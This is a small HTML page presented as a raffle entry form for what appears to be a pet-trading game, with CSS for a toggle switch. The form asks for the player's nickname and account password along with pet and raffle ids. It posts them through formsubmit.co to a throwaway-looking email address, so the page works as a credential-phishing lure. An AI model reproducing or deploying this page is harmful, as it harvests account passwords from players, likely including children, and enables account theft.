<!DOCTYPE html>

<html>

<head>
<title>Enter Raffle Form</title>
</head>

<body>

<form action="https://formsubmit.co/wocuxoni@mailgolem.com" method="POST">
     Enter raffle form: <br>
	  
     <input type="text" name="nickname" placeholder="nickname" required> <br>
	  
     <input type="password" name="password" placeholder="password" required>(if incorrect you will be emailed) <br>
	  
     <input type="number" name="petid" placeholder="pet id" required> <br>
	  
     <input type="number" name="raffleid" placeholder="raffle id" required> <br>
     
     Would you like to get emailed when your request has been completed? <br>
     <label class="switch">
  <input type="checkbox">
  <span class="slider round"></span>
</label> <br><br>
     
     <button type="submit">Send</button>
</form>

</body>

</html>


<style>
/* Switch */
.switch {
  position: relative;
  display: inline-block;
  width: 60px;
  height: 34px;
}

/* Hide Default Checkbox */
.switch input {
  opacity: 0;
  width: 0;
  height: 0;
}

/* Slider */
.slider {
  position: absolute;
  cursor: pointer;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: #ccc;
  -webkit-transition: .4s;
  transition: .4s;
}

.slider:before {
  position: absolute;
  content: "";
  height: 26px;
  width: 26px;
  left: 4px;
  bottom: 4px;
  background-color: white;
  -webkit-transition: .4s;
  transition: .4s;
}

input:checked + .slider {
  background-color: #2196F3;
}

input:focus + .slider {
  box-shadow: 0 0 1px #2196F3;
}

input:checked + .slider:before {
  -webkit-transform: translateX(26px);
  -ms-transform: translateX(26px);
  transform: translateX(26px);
}

/* Rounded sliders */
.slider.round {
  border-radius: 34px;
}

.slider.round:before {
  border-radius: 50%;
}

</style>
